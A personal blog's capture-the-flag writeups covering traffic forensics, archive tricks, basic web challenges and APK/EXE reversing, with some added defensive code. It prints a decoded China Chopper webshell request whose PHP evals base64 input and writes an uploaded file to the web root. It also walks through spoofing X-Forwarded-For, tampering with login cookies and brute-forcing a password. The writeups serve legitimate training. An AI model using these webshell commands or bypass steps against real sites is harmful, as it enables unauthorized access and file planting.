Filter the HTTP stream, find the file transfers, and export the packet bytes of each.

This gives 4327.png and keykey.rar.

Open the archive with the password found in the image to get the flag.

15. ssl

The challenge provides a key file; add it in Wireshark to decrypt the TLS.

After decryption, view the HTTP stream as usual to get the key.

16. findtheflag

Not done yet.

17. 流量解密 (Traffic decryption)

The HTTP stream contains synt{5r8qo5982rn88568o8n1s8rr8q061609}; ROT13 decoding gives the flag.

18. UP

Search for flag directly.

19. 2的平方 (2 squared)

Don't know how yet.

20. zip伪加密 (Zip pseudo-encryption)

Change the encryption bit in the 50 4B 01 02 (central directory header) block to an even value and the archive extracts normally.
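Pseudo-encryption is just bit 0 of the general-purpose flag set in the central directory (PK\x01\x02) while the data is stored in the clear. Here is an added Python example (not the author's tooling) that builds a constructed sample archive, sets that bit to show how zipfile then refuses it, and clears it again in both the central directory and the local headers.

```python
import io
import struct
import zipfile

CENTRAL_SIG = b"PK\x01\x02"   # central directory file header (the 50 4B 01 02 block)
LOCAL_SIG = b"PK\x03\x04"     # local file header
FLAG_OFFSET = {CENTRAL_SIG: 8, LOCAL_SIG: 6}   # offset of the 16-bit general-purpose flag field

def set_encryption_bit(data: bytes, signature: bytes, value: int) -> bytes:
    """Rewrite bit 0 of the general-purpose flag in every header carrying `signature`."""
    # A plain signature scan; a large archive could contain these bytes inside compressed
    # data by chance, so a production tool should walk the central directory instead.
    buf = bytearray(data)
    pos = buf.find(signature)
    while pos != -1:
        off = pos + FLAG_OFFSET[signature]
        (flags,) = struct.unpack_from("<H", buf, off)
        flags = (flags | 1) if value else (flags & ~1)
        struct.pack_into("<H", buf, off, flags)
        pos = buf.find(signature, pos + 4)
    return bytes(buf)

def make_sample_zip() -> bytes:
    """Constructed sample: one file, deflated, no encryption of any kind."""
    bio = io.BytesIO()
    with zipfile.ZipFile(bio, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("flag.txt", "flag{constructed_sample}")
    return bio.getvalue()

def pseudo_encrypt(data: bytes) -> bytes:
    """Mark the central directory as encrypted; the file data is untouched."""
    return set_encryption_bit(data, CENTRAL_SIG, 1)

def repair(data: bytes) -> bytes:
    """Clear the bit in both header kinds so every extractor agrees the data is plain."""
    data = set_encryption_bit(data, CENTRAL_SIG, 0)
    return set_encryption_bit(data, LOCAL_SIG, 0)

def looks_encrypted(data: bytes) -> bool:
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return any(info.flag_bits & 1 for info in zf.infolist())

def read_first(data: bytes) -> str:
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return zf.read(zf.namelist()[0]).decode()
```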

21. 一起来看图 (Let's look at a picture)

The given GIF does not animate; opening it in 010 Editor shows the GIF header is missing. Restore the header bytes 47 49 46 38 and piece the flag together frame by frame.

22. 后门连接 (Backdoor connection)

The capture shows some files being transferred.

Export the packet bytes of File Data from the corresponding request to get hello.rar, which holds the first half of the flag.

Decoding the other piece of Caidao (China Chopper) traffic reveals:

&cmd=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3B&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskZj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JGM9JF9QT1NUWyJ6MiJdOyRjPXN0cl9yZXBsYWNlKCJcciIsIiIsJGMpOyRjPXN0cl9yZXBsYWNlKCJcbiIsIiIsJGMpOyRidWY9IiI7Zm9yKCRpPTA7JGk8c3RybGVuKCRjKTskaSs9MikkYnVmLj11cmxkZWNvZGUoIiUiLnN1YnN0cigkYywkaSwyKSk7ZWNobyhAZndyaXRlKGZvcGVuKCRmLCJ3IiksJGJ1Zik%2FIjEiOiIwIik7O2VjaG8oInw8LSIpO2RpZSgpOw%3D%3D&z1=QzpcXEFwcFNlcnZcXHd3d1xcZmlsZXNcXHdvcmxkLnBuZw%3D%3D&z2=

Decoded:

z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$f=base64_decode($_POST["z1"]);$c=$_POST["z2"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode("%".substr($c,$i,2));echo(@fwrite(fopen($f,"w"),$buf)?"1":"0");;echo("|<-");die();

z1=C:\\AppServ\\www\\files\\world.png

Presumably z2 carries world.png; indeed z2 starts with 89504E47, the PNG file signature. Write the value out as a hex-decoded file and open the image to get the second half of the flag.

23. 瞒天过海 (Hidden in plain sight)

The challenge is a file without an extension; dropping it into 010 Editor shows the string wireshark.

Opening it in Wireshark, flag.rar can be exported, but it needs a password.

Searching for password turns up a suspicious TCP stream:

[root@localhost wireshark]# ls
1  2  3  test
[root@localhost wireshark]# cat 1
Rar!....3...
.............TU..<..... .+......flag.txt0.....n.Kr..z....uEo.Bn&=i.S..>....4.B..~...xj.".
...u......3.....jWj..%m..!.+h...+s..q#.]...3Ks.y.....r.2...wVQ....[root@localhost wireshark]# cat 2
19aaFYsQQKr+hVX6hl2smAUQ5a767TsULEUebWSajEo=[root@localhost wireshark]# ping baidu.com
PING baidu.com (111.13.101.208) 56(84) bytes of data.
64 bytes from 111.13.101.208 (111.13.101.208): icmp_seq=1 ttl=48 time=33.4 ms
64 bytes from 111.13.101.208 (111.13.101.208): icmp_seq=2 ttl=48 time=32.1 ms
64 bytes from 111.13.101.208 (111.13.101.208): icmp_seq=3 ttl=48 time=34.7 ms
64 bytes from 111.13.101.208 (111.13.101.208): icmp_seq=4 ttl=48 time=31.9 ms
..^C
--- baidu.com ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3037ms
rtt min/avg/max/mdev = 31.921/33.067/34.784/1.155 ms
[root@localhost wireshark]# cat 3
# coding:utf-8

__author__ = 'YFP'

from Crypto import Random

from Crypto.Cipher import AES

import sys

import base64

IV = 'QWERTYUIOPASDFGH'

def decrypt(encrypted):

  aes = AES.new(IV, AES.MODE_CBC, IV)

  return aes.decrypt(encrypted)

def encrypt(message):

  length = 16

  count = len(message)

  padding = length - (count % length)

  message = message + '\0' * padding

  aes = AES.new(IV, AES.MODE_CBC, IV)

  return aes.encrypt(message)

str = 'this is a test'

example = encrypt(str)

print(decrypt(example))

So 1 is a RAR archive, 2 is a string, and 3 is an encryption script.

Presumably 2 is the RAR password encrypted with 3; reversing it in code gives the archive password and then the flag.

from Crypto.Cipher import AES
import base64

# the script uses the same 16 bytes as key and IV; pycryptodome wants bytes, not str
IV = "QWERTYUIOPASDFGH".encode('UTF-8')

def decrypt(encrypted):
  aes = AES.new(IV, AES.MODE_CBC, IV)
  return aes.decrypt(encrypted)

def encrypt(message):
  length = 16
  count = len(message)
  padding = length - (count % length)
  message = (message + '\0' * padding).encode('UTF-8')   # the script pads with NUL bytes
  aes = AES.new(IV, AES.MODE_CBC, IV)
  return aes.encrypt(message)

# the string from file 2 is the base64 of the encrypted password
example = base64.b64decode("19aaFYsQQKr+hVX6hl2smAUQ5a767TsULEUebWSajEo=")

print(decrypt(example).rstrip(b'\0'))   # strip the NUL padding to get the password

24. 黑客入侵 (Hacker intrusion)

A hacker broke into our website; use traffic analysis to determine what data the hacker stole.

The capture shows a SQL injection. Find the last attempt of each injection round and concatenate them to get the flag string.

25. Welcome

Dropping the image into 010 Editor reveals an embedded archive; rename it and extract.

This gives another archive and a hint. The hint is JQK; how big a leap does it take to guess that this maps to the keyboard digits 178?

Brute-force the archive with those three digits to get an image; open it in 010 Editor and the flag is at the end.

26. 神秘的图片 (The mysterious image)

A mysterious person broke into a company system and left an image behind; can you find the message hidden in it? Hint: CRC, QR code

Per the hint, first use the CRC to check the width and height; this yields the first half of the flag and a hint that the second half is at the end of the file.

Export the dots and spaces at the end of the file, replace them with 0 and 1, and generate a QR code from the bits in code to get the second half of the flag:

from PIL import Image

MAX = 100                 # side length of the QR matrix; must satisfy MAX * MAX == len(bits)
pic = Image.new("RGB", (MAX, MAX))
bits = "10101010"         # replace with the actual 0/1 string (dots and spaces already converted)
i = 0
for y in range(0, MAX):
    for x in range(0, MAX):
        # '1' is a dark module, '0' a light one
        if bits[i] == '1':
            pic.putpixel((x, y), (0, 0, 0))
        else:
            pic.putpixel((x, y), (255, 255, 255))
        i = i + 1
pic.show()
pic.save("test.png")
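The script above expects the dot/space text to have been converted to 0/1 by hand and the side length to be known. As an added example (not the writeup's own script), the following does both steps without Pillow: it maps the characters to bits, infers the square size, refuses input that is not a perfect square, and writes a plain PBM file that any image viewer or QR scanner can open. The 5x5 pattern and the convention that `.` is a dark module are constructed assumptions.

```python
import math

# Constructed stand-in for the text found at the end of the file (not the real data).
# One row per line; '.' is assumed to be a dark module and ' ' a light one.
SAMPLE = "\n".join([". . .", " . . ", ". . .", " . . ", ". . ."])


def dots_to_bits(text, dark=".", light=" "):
    """Map dot/space characters to a '1'/'0' string, ignoring everything else (newlines etc.)."""
    return "".join("1" if c == dark else "0" for c in text if c in (dark, light))


def bits_to_matrix(bits, side=None):
    """Lay the bit string out as a square matrix; the side is inferred when not given."""
    if side is None:
        side = math.isqrt(len(bits))
    if side * side != len(bits):
        raise ValueError(f"{len(bits)} modules do not form a {side}x{side} square")
    return [[int(b) for b in bits[r * side:(r + 1) * side]] for r in range(side)]


def matrix_to_pbm(matrix, scale=10):
    """Render as plain PBM (P1, where 1 = black); scale enlarges each module so a scanner can read it."""
    side = len(matrix)
    lines = ["P1", f"{side * scale} {side * scale}"]
    for row in matrix:
        line = " ".join(str(v) for v in row for _ in range(scale))
        lines.extend([line] * scale)
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    matrix = bits_to_matrix(dots_to_bits(SAMPLE))
    with open("qr.pbm", "w") as fh:
        fh.write(matrix_to_pbm(matrix))
```

A real QR code has a quiet zone around it; if a scanner refuses the output, pad the matrix with a border of light modules before rendering.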

27、MISC300

The hacker used FTP with encrypted transfer; can you recover the flag from it?

Following the hint, export the FTP objects to obtain an archive and key.log. Add the key file as Wireshark's TLS key log file to decrypt the HTTP traffic; the decrypted traffic contains another archive. Export the packet bytes to get the file 2.mp3.

Look at the spectrogram to get the extraction password, then the flag.

28、EASER

Archive combination

The first archive's hint: Xiaoming likes to use his phone number as the zip password. Through OSINT we only learned that the number starts with 199. Can you open the archive? (The phone number is fabricated; do not try to call it or look it up.)

Run a mask attack for an 11-digit number starting with 199 to get the password, yielding the second archive.

The second archive has no hint, but a file with the same name exists both inside and outside it. Compressing readme.txt gives the same CRC, so a known-plaintext attack applies; it recovers the three keys and produces the cracked archive.

Archive 3 uses pseudo-encryption; fix it to get the final image, recompute the width and height from the CRC, and obtain the flag.
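Pseudo-encryption is nothing more than the "encrypted" bit (bit 0 of the general-purpose flags) being set in the ZIP headers while the member data is stored in the clear, which is why unzip tools demand a password that does not exist. As an added example (not the writeup's own tool), the following builds a constructed archive, reproduces the trick by setting the bit in both the local file header and the central directory entry, shows how `zipfile` then refuses to open the member, and repairs it by clearing the bit again.

```python
import io
import struct
import zipfile

LOCAL_SIG, LOCAL_FLAG_OFF = b"PK\x03\x04", 6      # local file header: flags at +6
CENTRAL_SIG, CENTRAL_FLAG_OFF = b"PK\x01\x02", 8  # central directory entry: flags at +8
ENCRYPTED_BIT = 0x0001                            # general-purpose flag bit 0


def build_sample_zip():
    """Constructed sample archive (not the challenge file): one stored, unencrypted member."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("readme.txt", b"plain data, no password was ever used\n")
    return buf.getvalue()


def _set_encrypted_bits(data, value):
    """Set (value=True) or clear the encrypted bit in every local and central header."""
    out = bytearray(data)
    for sig, off in ((LOCAL_SIG, LOCAL_FLAG_OFF), (CENTRAL_SIG, CENTRAL_FLAG_OFF)):
        pos = out.find(sig)
        while pos != -1:
            (flags,) = struct.unpack_from("<H", out, pos + off)
            flags = (flags | ENCRYPTED_BIT) if value else (flags & ~ENCRYPTED_BIT)
            struct.pack_into("<H", out, pos + off, flags)
            pos = out.find(sig, pos + len(sig))
    return bytes(out)


def pseudo_encrypt(data):
    """Reproduce the trick: flip the flag bit without encrypting any data."""
    return _set_encrypted_bits(data, True)


def repair(data):
    """Undo pseudo-encryption: clear the flag bit so the stored data is readable again."""
    return _set_encrypted_bits(data, False)


def inspect(data):
    """Per member: do the headers claim encryption, and does the data open without a password?"""
    report = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            (local_flags,) = struct.unpack_from("<H", data, info.header_offset + LOCAL_FLAG_OFF)
            try:
                zf.read(info.filename)
                opens = True
            except RuntimeError:        # zipfile refuses members whose flag says "encrypted"
                opens = False
            report.append({
                "name": info.filename,
                "central_flag": bool(info.flag_bits & ENCRYPTED_BIT),
                "local_flag": bool(local_flags & ENCRYPTED_BIT),
                "opens_without_password": opens,
            })
    return report


def read_member(data, name):
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return zf.read(name)


if __name__ == "__main__":
    broken = pseudo_encrypt(build_sample_zip())
    print(inspect(broken))
    print(read_member(repair(broken), "readme.txt"))
```

A member whose flag bit is set but whose local header, central entry and first data bytes look like an ordinary stored or deflated stream is the tell-tale sign; genuinely encrypted members carry a 12-byte encryption header before the data.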

Base

1、php-base1

View the page source to get the flag.

2、php-base2

The flag is in the response headers of the request.

3、php-base3

The hint asks whether you are really the local administrator; the request has to look like it comes from localhost, so add the header X-Forwarded-For: 127.0.0.1 to get the flag.
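The challenge works because the server derives "is this a local admin?" from a header the browser can set freely. As an added example, not the challenge's own code, here is a resolver that only honours X-Forwarded-For entries appended by known reverse proxies (the 10.0.0.0/8 range is an assumed deployment detail), next to the naive check the challenge reproduces:

```python
import ipaddress

# Assumed deployment: the application sits behind reverse proxies in 10.0.0.0/8; only
# those hops are allowed to contribute entries to X-Forwarded-For.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]


def naive_client_ip(remote_addr, xff_header=""):
    """The check the challenge implements: believe the header whenever it is present."""
    first = xff_header.split(",")[0].strip()
    return first or remote_addr


def client_ip(remote_addr, xff_header="", trusted=TRUSTED_PROXIES):
    """Walk the hop list from the TCP peer leftwards and stop at the first hop that is
    not one of our proxies. Entries further left were written by untrusted parties."""
    hops = [h.strip() for h in xff_header.split(",") if h.strip()] + [remote_addr]
    client = remote_addr
    for hop in reversed(hops):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            break                      # malformed entry: trust nothing beyond it
        client = hop
        if not any(addr in net for net in trusted):
            break                      # first non-proxy hop is the real client
    return client


def is_local_admin(remote_addr, xff_header=""):
    """Authorization decision based on the resolved address rather than the raw header."""
    return ipaddress.ip_address(client_ip(remote_addr, xff_header)).is_loopback


if __name__ == "__main__":
    # direct connection from the internet claiming to be localhost
    print(naive_client_ip("203.0.113.7", "127.0.0.1"), client_ip("203.0.113.7", "127.0.0.1"))
```

With a direct connection the spoofed header is ignored entirely; when the request really did pass through a trusted proxy, the resolver returns the address that proxy appended, not the value the client placed in front of it.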

4、php-base4

The hint asks for the PHP version; take the version number from the response headers and submit it.

5、php-base5

Not solved yet.

6、php-base6

The page title hints at password.txt; fetching it gives a password dictionary. Brute-forcing the login finds the real password, but logging in fails because the password field limits the input length; after editing the front-end code the login works.

After logging in the page says "there is no flag here", but the network requests show a hint in the cookie:

newpage=MjkwYmNhNzBjN2RhZTkzZGI2NjQ0ZmEwMGI5ZDgzYjkucGhw;
Base64-decoding it gives the new page:
290bca70c7dae93db6644fa00b9d83b9.php

This leads to Xiaohei's message board, which says you must post as Xiaohei. Submit some content and capture the request with Burp; several variables appear:

Cookie: IsLogin=0

content=test&userlevel=guest&Submit=%C1%F4%D1%D4

Modify them and resend; the flag is in the response headers:

Cookie: IsLogin=1

content=test&userlevel=root&Submit=%C1%F4%D1%D4
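Both IsLogin and userlevel live entirely in client-controlled data, so the server has no way to tell an edited value from the one it issued. As an added example (not the challenge's code), the following shows the standard fix: the server serializes the session, appends an HMAC-SHA256 tag under a key only it knows, and rejects any cookie whose payload no longer matches the tag. The key value and the claim names are constructed for the example.

```python
import base64
import hashlib
import hmac
import json

# Assumed: a key that exists only on the server and is never sent to the browser.
SERVER_KEY = b"example-server-only-key-change-me"


def _b64(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _unb64(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def issue_session(claims):
    """Serialize the session and append an HMAC-SHA256 tag over the exact payload bytes."""
    payload = _b64(json.dumps(claims, sort_keys=True).encode("utf-8"))
    tag = hmac.new(SERVER_KEY, payload.encode("ascii"), hashlib.sha256).hexdigest()
    return f"{payload}.{tag}"


def read_session(cookie):
    """Return the claims only if the tag verifies; any edit to the payload yields None."""
    payload, sep, tag = cookie.rpartition(".")
    if not sep:
        return None
    expected = hmac.new(SERVER_KEY, payload.encode("ascii"), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):   # constant-time comparison
        return None
    try:
        return json.loads(_unb64(payload))
    except (ValueError, UnicodeDecodeError):
        return None


def tamper_payload(cookie, **changes):
    """What the writeup did to the unsigned cookie: decode, edit the claims, re-encode,
    keeping the old tag. Used here only to show that the signed version rejects it."""
    payload, _, tag = cookie.rpartition(".")
    claims = json.loads(_unb64(payload))
    claims.update(changes)
    return f"{_b64(json.dumps(claims, sort_keys=True).encode('utf-8'))}.{tag}"


if __name__ == "__main__":
    cookie = issue_session({"IsLogin": 0, "userlevel": "guest"})
    print(read_session(cookie))
    print(read_session(tamper_payload(cookie, IsLogin=1, userlevel="root")))   # None
```

The same reasoning applies to the base64-encoded newpage cookie earlier in this challenge: encoding hides a value from a casual glance but gives the server no integrity guarantee, whereas a keyed MAC does.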

Reverse

1、APK1-bin.apk

Decompile it to get the flag.

2、APK2-bin2.apk

Decompilation shows that the MD5 of the package name is wrapped in flag{} and compared with the input.

3、APK3-bin3.apk

Re-implement the logic in Java, then convert the decimal values to ASCII.

public class test {

    public static void main(String[] args){
        // string taken from the decompiled APK; each character is shifted up by one ('\001')
        String flag = "B3DAC6B/8E/06AD762A08D/320@3A7/4";
        StringBuilder ascii = new StringBuilder();
        int i = 0;
        while (i < 32){
            // char + char is int arithmetic in Java, so this is the decimal code of the result
            int code = flag.charAt(i) + '\001';
            System.out.println(code);
            ascii.append((char) code);   // the same value as an ASCII character
            i++;                         // the original loop never advanced i
        }
        System.out.println(ascii);
    }
}

4、APK4-bin4.apk

Just XOR.

# byte values pulled from the decompiled APK; the check XORs each input byte with 0x63
flag=[84, 83, 32, 32, 37, 82, 84, 81, 84, 39, 81, 38, 85, 33, 39, 33, 33, 38, 80, 84, 81, 32, 90, 39, 90, 37, 33, 82, 85, 33, 87, 39]
ipt=""
for i in range(0,32):
    ipt+=chr(flag[i] ^ 0x63)   # XOR is its own inverse, so this recovers the expected input
print(ipt)

5、C.exe

A C# binary; opening it in dnSpy shows the Letters string being output in a specific order. Reconstruct it.

public char[] Letters = "ABCDEFGHIJKLMNOPQRSTUVWXYZ{}_".ToCharArray();

MessageBox.Show(new string(new char[]
{
	this.Letters[5],
	this.Letters[11],
	this.Letters[0],
	this.Letters[6],
	this.Letters[26],
	this.Letters[8],
	this.Letters[28],
	this.Letters[11],
	this.Letters[14],
	this.Letters[21],
	this.Letters[4],
	this.Letters[28],
	this.Letters[5],
	this.Letters[14],
	this.Letters[13],
	this.Letters[25],
	this.Letters[24],
	this.Letters[27]
}));

6、Crackme1.exe

Load it in x32dbg, run it, search the current module's strings and find the key code: the input string is compared with 52popjie.

7、UPX_

DIE identifies it as UPX-packed; unpack it.

Static analysis after unpacking did not work out, so debug it dynamically in x32dbg; after running, find the key string "成功了" (success), where the input is compared with HackAv.

8、helloELF

Load it in IDA and the flag string is visible.

9、BASE

In IDA, the input string is encoded and then compared with ZmxhZ#tiYXNlNjRfRjRubnl(.

if ( !strcmp(s1, "ZmxhZ#tiYXNlNjRfRjRubnl(") )
    puts("Success!");

Look at the encoding function:

void *__fastcall sub_92A(char *a1, unsigned __int64 a2, _QWORD *a3)
{
  int v4; // eax
  int v5; // eax
  int v6; // eax
  int v7; // [rsp+24h] [rbp-1Ch]
  int v8; // [rsp+24h] [rbp-1Ch]
  int v9; // [rsp+24h] [rbp-1Ch]
  int i; // [rsp+28h] [rbp-18h]
  int v11; // [rsp+2Ch] [rbp-14h]
  char *v12; // [rsp+30h] [rbp-10h]
  void *s; // [rsp+38h] [rbp-8h]

  if ( !a1 || !a2 )
    return 0LL;
  v7 = a2 / 3;
  if ( v7 % 3 )
    ++v7;
  v8 = 4 * v7;
  *a3 = v8;
  s = malloc(v8 + 1);
  if ( !s )
    return 0LL;
  memset(s, 0, v8 + 1);
  v12 = a1;
  v9 = a2;
  v11 = 0;
  while ( v9 > 0 )
  {
    byte_20201A = 0;
    byte_202019 = 0;
    byte_202018[0] = 0;
    for ( i = 0; i <= 2 && v9 > 0; ++i )
    {
      byte_202018[i] = *v12;
      --v9;
      ++v12;
    }
    if ( !i )
      break;
    switch ( i )
    {
      case 2:
        *((_BYTE *)s + v11) = aAbcdefghijklmn[(unsigned __int8)byte_202018[0] >> 2];
        *((_BYTE *)s + v11 + 1) = aAbcdefghijklmn[((unsigned __int8)byte_202019 >> 4) | (16 * byte_202018[0]) & 0x30];
        *((_BYTE *)s + v11 + 2) = aAbcdefghijklmn[((unsigned __int8)byte_20201A >> 6) | (4 * byte_202019) & 0x3C];
        v5 = v11 + 3;
        v11 += 4;
        *((_BYTE *)s + v5) = 61;
        break;
      case 3:
        *((_BYTE *)s + v11) = aAbcdefghijklmn[(unsigned __int8)byte_202018[0] >> 2];
        *((_BYTE *)s + v11 + 1) = aAbcdefghijklmn[((unsigned __int8)byte_202019 >> 4) | (16 * byte_202018[0]) & 0x30];
        *((_BYTE *)s + v11 + 2) = aAbcdefghijklmn[((unsigned __int8)byte_20201A >> 6) | (4 * byte_202019) & 0x3C];
        v6 = v11 + 3;
        v11 += 4;
        *((_BYTE *)s + v6) = aAbcdefghijklmn[byte_20201A & 0x3F];
        break;
      case 1:
        *((_BYTE *)s + v11) = aAbcdefghijklmn[(unsigned __int8)byte_202018[0] >> 2];
        *((_BYTE *)s + v11 + 1) = aAbcdefghijklmn[((unsigned __int8)byte_202019 >> 4) | (16 * byte_202018[0]) & 0x30];
        *((_BYTE *)s + v11 + 2) = 61;
        v4 = v11 + 3;
        v11 += 4;
        *((_BYTE *)s + v4) = 61;
        break;
    }
  }
  *((_BYTE *)s + v11) = 0;
  return s;
}

It is a custom Base64; the alphabet (aAbcdefghijklmn in the decompiled output, with the digits replaced by symbols) is:

aAbcdefghijklmn 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz)!@#$%^&*(+/='
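The bit packing in sub_92A is the ordinary Base64 layout; only the alphabet differs, with the ten digits replaced by the shifted-number-row symbols. That means the comparison string can be decoded by translating it back to the standard alphabet and calling the normal decoder. The following is an added example (not the challenge binary's code) that does exactly that and also re-implements the encoder so the binary's check can be reproduced:

```python
import base64

STANDARD = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
# alphabet recovered from the binary (aAbcdefghijklmn): digits 0-9 become )!@#$%^&*(
CUSTOM = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz)!@#$%^&*(+/="

TO_STANDARD = str.maketrans(CUSTOM, STANDARD)
TO_CUSTOM = str.maketrans(STANDARD, CUSTOM)


def custom_b64decode(text):
    """Undo the alphabet swap, then use the ordinary decoder (the bit layout is unchanged)."""
    return base64.b64decode(text.translate(TO_STANDARD))


def custom_b64encode(data):
    """Mirror of sub_92A: standard Base64 packing and '=' padding, with the swapped alphabet."""
    return base64.b64encode(data).decode("ascii").translate(TO_CUSTOM)


def check(user_input, expected="ZmxhZ#tiYXNlNjRfRjRubnl("):
    """The same comparison the binary performs on the user's input."""
    return custom_b64encode(user_input.encode("utf-8")) == expected


if __name__ == "__main__":
    print(custom_b64decode("ZmxhZ#tiYXNlNjRfRjRubnl("))
```

Only the `#` and `(` in the comparison string are affected by the swap (they stand for `3` and `9`); every other character is already in the standard alphabet, which is why the string looks almost like ordinary Base64 at first glance.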

10、maze

The map obtained statically is wrong; attach IDA to a Linux debugging session, copy the map out of memory, and then walk the maze.

11、Reverse000.exe

Search for the characteristic string from the hint to locate the corresponding function.

Tags: none
Last updated: 15 December 2023

Lufer

A new day begins


COPYRIGHT © 2022 lufer.cc.
